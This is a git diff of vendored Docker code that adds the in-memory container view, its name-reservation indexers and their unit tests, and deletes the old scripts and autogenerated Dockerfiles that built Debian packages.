+// Get returns an item by id. Returned objects must never be modified.
+func (v *memdbView) Get(id string) (*Snapshot, error) {
+	s, err := v.txn.First(memdbContainersTable, memdbIDIndex, id)
+	if err != nil {
+		return nil, err
+	}
+	if s == nil {
+		return nil, NoSuchContainerError{id: id}
+	}
+	return v.transform(s.(*Container)), nil
+}
+
+// getNames lists all the reserved names for the given container ID.
+func (v *memdbView) getNames(containerID string) []string {
+	iter, err := v.txn.Get(memdbNamesTable, memdbContainerIDIndex, containerID)
+	if err != nil {
+		return nil
+	}
+
+	var names []string
+	for {
+		item := iter.Next()
+		if item == nil {
+			break
+		}
+		names = append(names, item.(nameAssociation).name)
+	}
+
+	return names
+}
+
+// GetID returns the container ID that the passed in name is reserved to.
+func (v *memdbView) GetID(name string) (string, error) {
+	s, err := v.txn.First(memdbNamesTable, memdbIDIndex, name)
+	if err != nil {
+		return "", err
+	}
+	if s == nil {
+		return "", ErrNameNotReserved
+	}
+	return s.(nameAssociation).containerID, nil
+}
+
+// GetAllNames returns all registered names.
+func (v *memdbView) GetAllNames() map[string][]string {
+	iter, err := v.txn.Get(memdbNamesTable, memdbContainerIDIndex)
+	if err != nil {
+		return nil
+	}
+
+	out := make(map[string][]string)
+	for {
+		item := iter.Next()
+		if item == nil {
+			break
+		}
+		assoc := item.(nameAssociation)
+		out[assoc.containerID] = append(out[assoc.containerID], assoc.name)
+	}
+
+	return out
+}
+
+// transform maps a (deep) copied Container object to what queries need.
+// A lock on the Container is not held because these are immutable deep copies.
+func (v *memdbView) transform(container *Container) *Snapshot {
+	health := types.NoHealthcheck
+	if container.Health != nil {
+		health = container.Health.Status()
+	}
+	snapshot := &Snapshot{
+		Container: types.Container{
+			ID:      container.ID,
+			Names:   v.getNames(container.ID),
+			ImageID: container.ImageID.String(),
+			Ports:   []types.Port{},
+			Mounts:  container.GetMountPoints(),
+			State:   container.State.StateString(),
+			Status:  container.State.String(),
+			Created: container.Created.Unix(),
+		},
+		CreatedAt:    container.Created,
+		StartedAt:    container.StartedAt,
+		Name:         container.Name,
+		Pid:          container.Pid,
+		Managed:      container.Managed,
+		ExposedPorts: make(nat.PortSet),
+		PortBindings: make(nat.PortSet),
+		Health:       health,
+		Running:      container.Running,
+		Paused:       container.Paused,
+		ExitCode:     container.ExitCode(),
+	}
+
+	if snapshot.Names == nil {
+		// Dead containers will often have no name, so make sure the response isn't null
+		snapshot.Names = []string{}
+	}
+
+	if container.HostConfig != nil {
+		snapshot.Container.HostConfig.NetworkMode = string(container.HostConfig.NetworkMode)
+		snapshot.HostConfig.Isolation = string(container.HostConfig.Isolation)
+		for binding := range container.HostConfig.PortBindings {
+			snapshot.PortBindings[binding] = struct{}{}
+		}
+	}
+
+	if container.Config != nil {
+		snapshot.Image = container.Config.Image
+		snapshot.Labels = container.Config.Labels
+		for exposed := range container.Config.ExposedPorts {
+			snapshot.ExposedPorts[exposed] = struct{}{}
+		}
+	}
+
+	if len(container.Args) > 0 {
+		var args []string
+		for _, arg := range container.Args {
+			if strings.Contains(arg, " ") {
+				args = append(args, fmt.Sprintf("'%s'", arg))
+			} else {
+				args = append(args, arg)
+			}
+		}
+		argsAsString := strings.Join(args, " ")
+		snapshot.Command = fmt.Sprintf("%s %s", container.Path, argsAsString)
+	} else {
+		snapshot.Command = container.Path
+	}
+
+	snapshot.Ports = []types.Port{}
+	networks := make(map[string]*network.EndpointSettings)
+	if container.NetworkSettings != nil {
+		for name, netw := range container.NetworkSettings.Networks {
+			if netw == nil || netw.EndpointSettings == nil {
+				continue
+			}
+			networks[name] = &network.EndpointSettings{
+				EndpointID:          netw.EndpointID,
+				Gateway:             netw.Gateway,
+				IPAddress:           netw.IPAddress,
+				IPPrefixLen:         netw.IPPrefixLen,
+				IPv6Gateway:         netw.IPv6Gateway,
+				GlobalIPv6Address:   netw.GlobalIPv6Address,
+				GlobalIPv6PrefixLen: netw.GlobalIPv6PrefixLen,
+				MacAddress:          netw.MacAddress,
+				NetworkID:           netw.NetworkID,
+			}
+			if netw.IPAMConfig != nil {
+				networks[name].IPAMConfig = &network.EndpointIPAMConfig{
+					IPv4Address: netw.IPAMConfig.IPv4Address,
+					IPv6Address: netw.IPAMConfig.IPv6Address,
+				}
+			}
+		}
+		for port, bindings := range container.NetworkSettings.Ports {
+			p, err := nat.ParsePort(port.Port())
+			if err != nil {
+				logrus.Warnf("invalid port map %+v", err)
+				continue
+			}
+			if len(bindings) == 0 {
+				snapshot.Ports = append(snapshot.Ports, types.Port{
+					PrivatePort: uint16(p),
+					Type:        port.Proto(),
+				})
+				continue
+			}
+			for _, binding := range bindings {
+				h, err := nat.ParsePort(binding.HostPort)
+				if err != nil {
+					logrus.Warnf("invalid host port map %+v", err)
+					continue
+				}
+				snapshot.Ports = append(snapshot.Ports, types.Port{
+					PrivatePort: uint16(p),
+					PublicPort:  uint16(h),
+					Type:        port.Proto(),
+					IP:          binding.HostIP,
+				})
+			}
+		}
+	}
+	snapshot.NetworkSettings = &types.SummaryNetworkSettings{Networks: networks}
+
+	return snapshot
+}
+
+// containerByIDIndexer is used to extract the ID field from Container types.
+// memdb.StringFieldIndex can not be used since ID is a field from an embedded struct.
+type containerByIDIndexer struct{}
+
+// FromObject implements the memdb.SingleIndexer interface for Container objects
+func (e *containerByIDIndexer) FromObject(obj interface{}) (bool, []byte, error) {
+	c, ok := obj.(*Container)
+	if !ok {
+		return false, nil, fmt.Errorf("%T is not a Container", obj)
+	}
+	// Add the null character as a terminator
+	v := c.ID + "\x00"
+	return true, []byte(v), nil
+}
+
+// FromArgs implements the memdb.Indexer interface
+func (e *containerByIDIndexer) FromArgs(args ...interface{}) ([]byte, error) {
+	if len(args) != 1 {
+		return nil, fmt.Errorf("must provide only a single argument")
+	}
+	arg, ok := args[0].(string)
+	if !ok {
+		return nil, fmt.Errorf("argument must be a string: %#v", args[0])
+	}
+	// Add the null character as a terminator
+	arg += "\x00"
+	return []byte(arg), nil
+}
+
+// namesByNameIndexer is used to index container name associations by name.
+type namesByNameIndexer struct{}
+
+func (e *namesByNameIndexer) FromObject(obj interface{}) (bool, []byte, error) {
+	n, ok := obj.(nameAssociation)
+	if !ok {
+		return false, nil, fmt.Errorf(`%T does not have type "nameAssociation"`, obj)
+	}
+
+	// Add the null character as a terminator
+	return true, []byte(n.name + "\x00"), nil
+}
+
+func (e *namesByNameIndexer) FromArgs(args ...interface{}) ([]byte, error) {
+	if len(args) != 1 {
+		return nil, fmt.Errorf("must provide only a single argument")
+	}
+	arg, ok := args[0].(string)
+	if !ok {
+		return nil, fmt.Errorf("argument must be a string: %#v", args[0])
+	}
+	// Add the null character as a terminator
+	arg += "\x00"
+	return []byte(arg), nil
+}
+
+// namesByContainerIDIndexer is used to index container names by container ID.
+type namesByContainerIDIndexer struct{}
+
+func (e *namesByContainerIDIndexer) FromObject(obj interface{}) (bool, []byte, error) {
+	n, ok := obj.(nameAssociation)
+	if !ok {
+		return false, nil, fmt.Errorf(`%T does not have type "nameAssocation"`, obj)
+	}
+
+	// Add the null character as a terminator
+	return true, []byte(n.containerID + "\x00"), nil
+}
+
+func (e *namesByContainerIDIndexer) FromArgs(args ...interface{}) ([]byte, error) {
+	if len(args) != 1 {
+		return nil, fmt.Errorf("must provide only a single argument")
+	}
+	arg, ok := args[0].(string)
+	if !ok {
+		return nil, fmt.Errorf("argument must be a string: %#v", args[0])
+	}
+	// Add the null character as a terminator
+	arg += "\x00"
+	return []byte(arg), nil
+}
diff --git a/vendor/github.com/docker/docker/container/view_test.go b/vendor/github.com/docker/docker/container/view_test.go
new file mode 100644
index 0000000000..434b7c618d
--- /dev/null
+++ b/vendor/github.com/docker/docker/container/view_test.go
@@ -0,0 +1,186 @@
+package container // import "github.com/docker/docker/container"
+
+import (
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	containertypes "github.com/docker/docker/api/types/container"
+	"github.com/pborman/uuid"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+var root string
+
+func TestMain(m *testing.M) {
+	var err error
+	root, err = ioutil.TempDir("", "docker-container-test-")
+	if err != nil {
+		panic(err)
+	}
+	defer os.RemoveAll(root)
+
+	os.Exit(m.Run())
+}
+
+func newContainer(t *testing.T) *Container {
+	var (
+		id    = uuid.New()
+		cRoot = filepath.Join(root, id)
+	)
+	if err := os.MkdirAll(cRoot, 0755); err != nil {
+		t.Fatal(err)
+	}
+	c := NewBaseContainer(id, cRoot)
+	c.HostConfig = &containertypes.HostConfig{}
+	return c
+}
+
+func TestViewSaveDelete(t *testing.T) {
+	db, err := NewViewDB()
+	if err != nil {
+		t.Fatal(err)
+	}
+	c := newContainer(t)
+	if err := c.CheckpointTo(db); err != nil {
+		t.Fatal(err)
+	}
+	if err := db.Delete(c); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestViewAll(t *testing.T) {
+	var (
+		db, _ = NewViewDB()
+		one   = newContainer(t)
+		two   = newContainer(t)
+	)
+	one.Pid = 10
+	if err := one.CheckpointTo(db); err != nil {
+		t.Fatal(err)
+	}
+	two.Pid = 20
+	if err := two.CheckpointTo(db); err != nil {
+		t.Fatal(err)
+	}
+
+	all, err := db.Snapshot().All()
+	if err != nil {
+		t.Fatal(err)
+	}
+	if l := len(all); l != 2 {
+		t.Fatalf("expected 2 items, got %d", l)
+	}
+	byID := make(map[string]Snapshot)
+	for i := range all {
+		byID[all[i].ID] = all[i]
+	}
+	if s, ok := byID[one.ID]; !ok || s.Pid != 10 {
+		t.Fatalf("expected something different with for id=%s: %v", one.ID, s)
+	}
+	if s, ok := byID[two.ID]; !ok || s.Pid != 20 {
+		t.Fatalf("expected something different with for id=%s: %v", two.ID, s)
+	}
+}
+
+func TestViewGet(t *testing.T) {
+	var (
+		db, _ = NewViewDB()
+		one   = newContainer(t)
+	)
+	one.ImageID = "some-image-123"
+	if err := one.CheckpointTo(db); err != nil {
+		t.Fatal(err)
+	}
+	s, err := db.Snapshot().Get(one.ID)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if s == nil || s.ImageID != "some-image-123" {
+		t.Fatalf("expected ImageID=some-image-123. Got: %v", s)
+	}
+}
+
+func TestNames(t *testing.T) {
+	db, err := NewViewDB()
+	if err != nil {
+		t.Fatal(err)
+	}
+	assert.Check(t, db.ReserveName("name1", "containerid1"))
+	assert.Check(t, db.ReserveName("name1", "containerid1")) // idempotent
+	assert.Check(t, db.ReserveName("name2", "containerid2"))
+	assert.Check(t, is.Error(db.ReserveName("name2", "containerid3"), ErrNameReserved.Error()))
+
+	// Releasing a name allows the name to point to something else later.
+	assert.Check(t, db.ReleaseName("name2"))
+	assert.Check(t, db.ReserveName("name2", "containerid3"))
+
+	view := db.Snapshot()
+
+	id, err := view.GetID("name1")
+	assert.Check(t, err)
+	assert.Check(t, is.Equal("containerid1", id))
+
+	id, err = view.GetID("name2")
+	assert.Check(t, err)
+	assert.Check(t, is.Equal("containerid3", id))
+
+	_, err = view.GetID("notreserved")
+	assert.Check(t, is.Error(err, ErrNameNotReserved.Error()))
+
+	// Releasing and re-reserving a name doesn't affect the snapshot.
+	assert.Check(t, db.ReleaseName("name2"))
+	assert.Check(t, db.ReserveName("name2", "containerid4"))
+
+	id, err = view.GetID("name1")
+	assert.Check(t, err)
+	assert.Check(t, is.Equal("containerid1", id))
+
+	id, err = view.GetID("name2")
+	assert.Check(t, err)
+	assert.Check(t, is.Equal("containerid3", id))
+
+	// GetAllNames
+	assert.Check(t, is.DeepEqual(map[string][]string{"containerid1": {"name1"}, "containerid3": {"name2"}}, view.GetAllNames()))
+
+	assert.Check(t, db.ReserveName("name3", "containerid1"))
+	assert.Check(t, db.ReserveName("name4", "containerid1"))
+
+	view = db.Snapshot()
+	assert.Check(t, is.DeepEqual(map[string][]string{"containerid1": {"name1", "name3", "name4"}, "containerid4": {"name2"}}, view.GetAllNames()))
+
+	// Release containerid1's names with Delete even though no container exists
+	assert.Check(t, db.Delete(&Container{ID: "containerid1"}))
+
+	// Reusing one of those names should work
+	assert.Check(t, db.ReserveName("name1", "containerid4"))
+	view = db.Snapshot()
+	assert.Check(t, is.DeepEqual(map[string][]string{"containerid4": {"name1", "name2"}}, view.GetAllNames()))
+}
+
+// Test case for GitHub issue 35920
+func TestViewWithHealthCheck(t *testing.T) {
+	var (
+		db, _ = NewViewDB()
+		one   = newContainer(t)
+	)
+	one.Health = &Health{
+		Health: types.Health{
+			Status: "starting",
+		},
+	}
+	if err := one.CheckpointTo(db); err != nil {
+		t.Fatal(err)
+	}
+	s, err := db.Snapshot().Get(one.ID)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if s == nil || s.Health != "starting" {
+		t.Fatalf("expected Health=starting. Got: %+v", s)
+	}
+}
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/build.sh b/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/build.sh
deleted file mode 100755
index 8271d9dc47..0000000000
--- a/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/build.sh
+++ /dev/null
@@ -1,10 +0,0 @@
-#!/bin/bash
-set -e
-
-cd "$(dirname "$(readlink -f "$BASH_SOURCE")")"
-
-set -x
-./generate.sh
-for d in */; do
-	docker build -t "dockercore/builder-deb:$(basename "$d")" "$d"
-done
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/generate.sh b/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/generate.sh
deleted file mode 100755
index b5040b709a..0000000000
--- a/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/generate.sh
+++ /dev/null
@@ -1,118 +0,0 @@
-#!/bin/bash
-set -e
-
-# This file is used to auto-generate Dockerfiles for making debs via 'make deb'
-#
-# usage: ./generate.sh [versions]
-#    ie: ./generate.sh
-#        to update all Dockerfiles in this directory
-#    or: ./generate.sh ubuntu-trusty
-#        to only update ubuntu-trusty/Dockerfile
-#    or: ./generate.sh ubuntu-newversion
-#        to create a new folder and a Dockerfile within it
-#
-# Note: non-LTS versions are not guaranteed to work.
-
-cd "$(dirname "$(readlink -f "$BASH_SOURCE")")"
-
-versions=( "$@" )
-if [ ${#versions[@]} -eq 0 ]; then
-	versions=( */ )
-fi
-versions=( "${versions[@]%/}" )
-
-for version in "${versions[@]}"; do
-	echo "${versions[@]}"
-	distro="${version%-*}"
-	suite="${version##*-}"
-	from="aarch64/${distro}:${suite}"
-
-	mkdir -p "$version"
-	echo "$version -> FROM $from"
-	cat > "$version/Dockerfile" <<-EOF
-		#
-		# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/aarch64/generate.sh"!
-		#
-
-		FROM $from
-
-	EOF
-
-	dockerBuildTags='apparmor pkcs11 selinux'
-	runcBuildTags='apparmor selinux'
-
-	# this list is sorted alphabetically; please keep it that way
-	packages=(
-		apparmor # for apparmor_parser for testing the profile
-		bash-completion # for bash-completion debhelper integration
-		btrfs-tools # for "btrfs/ioctl.h" (and "version.h" if possible)
-		build-essential # "essential for building Debian packages"
-		cmake # tini dep
-		curl ca-certificates # for downloading Go
-		debhelper # for easy ".deb" building
-		dh-apparmor # for apparmor debhelper
-		dh-systemd # for systemd debhelper integration
-		git # for "git commit" info in "docker -v"
-		libapparmor-dev # for "sys/apparmor.h"
-		libdevmapper-dev # for "libdevmapper.h"
-		libltdl-dev # for pkcs11 "ltdl.h"
-		libsqlite3-dev # for "sqlite3.h"
-		pkg-config # for detecting things like libsystemd-journal dynamically
-		vim-common # tini dep
-	)
-
-	case "$suite" in
-		trusty)
-			packages+=( libsystemd-journal-dev )
-			# aarch64 doesn't have an official downloadable binary for go.
-			# And gccgo for trusty only includes Go 1.2 implementation which
-			# is too old to build current go source, fortunately trusty has
-			# golang-1.6-go package can be used as bootstrap.
-			packages+=( golang-1.6-go )
-			;;
-		xenial)
-			packages+=( libsystemd-dev )
-			packages+=( golang-go libseccomp-dev)
-
-			dockerBuildTags="$dockerBuildTags seccomp"
-			runcBuildTags="$runcBuildTags seccomp"
-			;;
-		*)
-			echo "Unsupported distro:" $distro:$suite
-			rm -fr "$version"
-			exit 1
-			;;
-	esac
-
-	# update and install packages
-	echo "RUN apt-get update && apt-get install -y ${packages[*]} --no-install-recommends && rm -rf /var/lib/apt/lists/*" >> "$version/Dockerfile"
-	echo >> "$version/Dockerfile"
-
-	case "$suite" in
-		trusty)
-			echo 'RUN update-alternatives --install /usr/bin/go go /usr/lib/go-1.6/bin/go 100' >> "$version/Dockerfile"
-			echo >> "$version/Dockerfile"
-			;;
-		*)
-			;;
-	esac
-
-	echo "# Install Go" >> "$version/Dockerfile"
-	echo "# aarch64 doesn't have official go binaries, so use the version of go installed from" >> "$version/Dockerfile"
-	echo "# the image to build go from source." >> "$version/Dockerfile"
-
-	awk '$1 == "ENV" && $2 == "GO_VERSION" { print; exit }' ../../../../Dockerfile.aarch64 >> "$version/Dockerfile"
-	echo 'RUN mkdir /usr/src/go && curl -fsSL https://golang.org/dl/go${GO_VERSION}.src.tar.gz | tar -v -C /usr/src/go -xz --strip-components=1 \' >> "$version/Dockerfile"
-	echo '	&& cd /usr/src/go/src \' >> "$version/Dockerfile"
-	echo '	&& GOOS=linux GOARCH=arm64 GOROOT_BOOTSTRAP="$(go env GOROOT)" ./make.bash' >> "$version/Dockerfile"
-	echo >> "$version/Dockerfile"
-
-	echo 'ENV PATH $PATH:/usr/src/go/bin' >> "$version/Dockerfile"
-	echo >> "$version/Dockerfile"
-
-	echo "ENV AUTO_GOPATH 1" >> "$version/Dockerfile"
-	echo >> "$version/Dockerfile"
-
-	echo "ENV DOCKER_BUILDTAGS $dockerBuildTags" >> "$version/Dockerfile"
-	echo "ENV RUNC_BUILDTAGS $runcBuildTags" >> "$version/Dockerfile"
-done
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-trusty/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-trusty/Dockerfile
deleted file mode 100644
index d04860ccd7..0000000000
--- a/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-trusty/Dockerfile
+++ /dev/null
@@ -1,24 +0,0 @@
-#
-# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/aarch64/generate.sh"!
-#
-
-FROM aarch64/ubuntu:trusty
-
-RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libsystemd-journal-dev golang-1.6-go --no-install-recommends && rm -rf /var/lib/apt/lists/*
-
-RUN update-alternatives --install /usr/bin/go go /usr/lib/go-1.6/bin/go 100
-
-# Install Go
-# aarch64 doesn't have official go binaries, so use the version of go installed from
-# the image to build go from source.
-ENV GO_VERSION 1.7.5
-RUN mkdir /usr/src/go && curl -fsSL https://golang.org/dl/go${GO_VERSION}.src.tar.gz | tar -v -C /usr/src/go -xz --strip-components=1 \
-	&& cd /usr/src/go/src \
-	&& GOOS=linux GOARCH=arm64 GOROOT_BOOTSTRAP="$(go env GOROOT)" ./make.bash
-
-ENV PATH $PATH:/usr/src/go/bin
-
-ENV AUTO_GOPATH 1
-
-ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux
-ENV RUNC_BUILDTAGS apparmor selinux
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-xenial/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-xenial/Dockerfile
deleted file mode 100644
index 3cd8442eca..0000000000
--- a/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-xenial/Dockerfile
+++ /dev/null
@@ -1,22 +0,0 @@
-#
-# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/aarch64/generate.sh"!
-#
-
-FROM aarch64/ubuntu:xenial
-
-RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libsystemd-dev golang-go libseccomp-dev --no-install-recommends && rm -rf /var/lib/apt/lists/*
-
-# Install Go
-# aarch64 doesn't have official go binaries, so use the version of go installed from
-# the image to build go from source.
-ENV GO_VERSION 1.7.5
-RUN mkdir /usr/src/go && curl -fsSL https://golang.org/dl/go${GO_VERSION}.src.tar.gz | tar -v -C /usr/src/go -xz --strip-components=1 \
-	&& cd /usr/src/go/src \
-	&& GOOS=linux GOARCH=arm64 GOROOT_BOOTSTRAP="$(go env GOROOT)" ./make.bash
-
-ENV PATH $PATH:/usr/src/go/bin
-
-ENV AUTO_GOPATH 1
-
-ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux seccomp
-ENV RUNC_BUILDTAGS apparmor selinux seccomp
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/README.md b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/README.md
deleted file mode 100644
index 20a0ff1006..0000000000
--- a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/README.md
+++ /dev/null
@@ -1,5 +0,0 @@
-# `dockercore/builder-deb`
-
-This image's tags contain the dependencies for building Docker `.deb`s for each of the Debian-based platforms Docker targets.
-
-To add new tags, see [`contrib/builder/deb/amd64` in https://github.com/docker/docker](https://github.com/docker/docker/tree/master/contrib/builder/deb/amd64), specifically the `generate.sh` script, whose usage is described in a comment at the top of the file.
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/build.sh b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/build.sh
deleted file mode 100755
index 8271d9dc47..0000000000
--- a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/build.sh
+++ /dev/null
@@ -1,10 +0,0 @@
-#!/bin/bash
-set -e
-
-cd "$(dirname "$(readlink -f "$BASH_SOURCE")")"
-
-set -x
-./generate.sh
-for d in */; do
-	docker build -t "dockercore/builder-deb:$(basename "$d")" "$d"
-done
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-jessie/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-jessie/Dockerfile
deleted file mode 100644
index 42aaa56c01..0000000000
--- a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-jessie/Dockerfile
+++ /dev/null
@@ -1,20 +0,0 @@
-#
-# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"!
-#
-
-FROM debian:jessie
-
-# allow replacing httpredir or deb mirror
-ARG APT_MIRROR=deb.debian.org
-RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list
-
-RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev  libsqlite3-dev pkg-config vim-common libsystemd-journal-dev --no-install-recommends && rm -rf /var/lib/apt/lists/*
-
-ENV GO_VERSION 1.7.5
-RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local
-ENV PATH $PATH:/usr/local/go/bin
-
-ENV AUTO_GOPATH 1
-
-ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux
-ENV RUNC_BUILDTAGS apparmor selinux
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-stretch/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-stretch/Dockerfile
deleted file mode 100644
index c052be56ce..0000000000
--- a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-stretch/Dockerfile
+++ /dev/null
@@ -1,20 +0,0 @@
-#
-# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"!
-#
-
-FROM debian:stretch
-
-# allow replacing httpredir or deb mirror
-ARG APT_MIRROR=deb.debian.org
-RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list
-
-RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libseccomp-dev libsqlite3-dev pkg-config vim-common libsystemd-dev --no-install-recommends && rm -rf /var/lib/apt/lists/*
-
-ENV GO_VERSION 1.7.5
-RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local
-ENV PATH $PATH:/usr/local/go/bin
-
-ENV AUTO_GOPATH 1
-
-ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux
-ENV RUNC_BUILDTAGS apparmor seccomp selinux
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-wheezy/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-wheezy/Dockerfile
deleted file mode 100644
index bcedb47b94..0000000000
--- a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-wheezy/Dockerfile
+++ /dev/null
@@ -1,22 +0,0 @@
-#
-# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"!
-#
-
-FROM debian:wheezy-backports
-
-# allow replacing httpredir or deb mirror
-ARG APT_MIRROR=deb.debian.org
-RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list
-RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list.d/backports.list
-
-RUN apt-get update && apt-get install -y -t wheezy-backports btrfs-tools --no-install-recommends && rm -rf /var/lib/apt/lists/*
-RUN apt-get update && apt-get install -y apparmor bash-completion  build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev  libsqlite3-dev pkg-config vim-common --no-install-recommends && rm -rf /var/lib/apt/lists/*
-
-ENV GO_VERSION 1.7.5
-RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local
-ENV PATH $PATH:/usr/local/go/bin
-
-ENV AUTO_GOPATH 1
-
-ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux
-ENV RUNC_BUILDTAGS apparmor selinux
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/generate.sh b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/generate.sh
deleted file mode 100755
index 765db5d8e9..0000000000
--- a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/generate.sh
+++ /dev/null
@@ -1,149 +0,0 @@
-#!/bin/bash
-set -e
-
-# usage: ./generate.sh [versions]
-#    ie: ./generate.sh
-#        to update all Dockerfiles in this directory
-#    or: ./generate.sh debian-jessie
-#        to only update debian-jessie/Dockerfile
-#    or: ./generate.sh debian-newversion
-#        to create a new folder and a Dockerfile within it
-
-cd "$(dirname "$(readlink -f "$BASH_SOURCE")")"
-
-versions=( "$@" )
-if [ ${#versions[@]} -eq 0 ]; then
-	versions=( */ )
-fi
-versions=( "${versions[@]%/}" )
-
-for version in "${versions[@]}"; do
-	distro="${version%-*}"
-	suite="${version##*-}"
-	from="${distro}:${suite}"
-
-	case "$from" in
-		debian:wheezy)
-			# add -backports, like our users have to
-			from+='-backports'
-			;;
-	esac
-
-	mkdir -p "$version"
-	echo "$version -> FROM $from"
-	cat > "$version/Dockerfile" <<-EOF
-		#
-		# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"!
-		#
-
-		FROM $from
-	EOF
-
-	echo >> "$version/Dockerfile"
-
-	if [ "$distro" = "debian" ]; then
-		cat >> "$version/Dockerfile" <<-'EOF'
-			# allow replacing httpredir or deb mirror
-			ARG APT_MIRROR=deb.debian.org
-			RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list
-		EOF
-
-		if [ "$suite" = "wheezy" ]; then
-			cat >> "$version/Dockerfile" <<-'EOF'
-				RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list.d/backports.list
-			EOF
-		fi
-
-		echo "" >> "$version/Dockerfile"
-	fi
-
-	extraBuildTags='pkcs11'
-	runcBuildTags=
-
-	# this list is sorted alphabetically; please keep it that way
-	packages=(
-		apparmor # for apparmor_parser for testing the profile
-		bash-completion # for bash-completion debhelper integration
-		btrfs-tools # for "btrfs/ioctl.h" (and "version.h" if possible)
-		build-essential # "essential for building Debian packages"
-		cmake # tini dep
-		curl ca-certificates # for downloading Go
-		debhelper # for easy ".deb" building
-		dh-apparmor # for apparmor debhelper
-		dh-systemd # for systemd debhelper integration
-		git # for "git commit" info in "docker -v"
-		libapparmor-dev # for "sys/apparmor.h"
-		libdevmapper-dev # for "libdevmapper.h"
-		libltdl-dev # for pkcs11 "ltdl.h"
-		libseccomp-dev  # for "seccomp.h" & "libseccomp.so"
-		libsqlite3-dev # for "sqlite3.h"
-		pkg-config # for detecting things like libsystemd-journal dynamically
-		vim-common # tini dep
-	)
-	# packaging for "sd-journal.h" and libraries varies
-	case "$suite" in
-		precise|wheezy) ;;
-		jessie|trusty) packages+=( libsystemd-journal-dev );;
-		*) packages+=( libsystemd-dev );;
-	esac
-
-	# debian wheezy & ubuntu precise do not have the right libseccomp libs
-	# debian jessie & ubuntu trusty have a libseccomp < 2.2.1 :(
-	case "$suite" in
-		precise|wheezy|jessie|trusty)
-			packages=( "${packages[@]/libseccomp-dev}" )
-			runcBuildTags="apparmor selinux"
-			;;
-		*)
-			extraBuildTags+=' seccomp'
-			runcBuildTags="apparmor seccomp selinux"
-			;;
-	esac
-
-
-	if [ "$suite" = 'precise' ]; then
-		# precise has a few package issues
-
-		# - dh-systemd doesn't exist at all
-		packages=( "${packages[@]/dh-systemd}" )
-
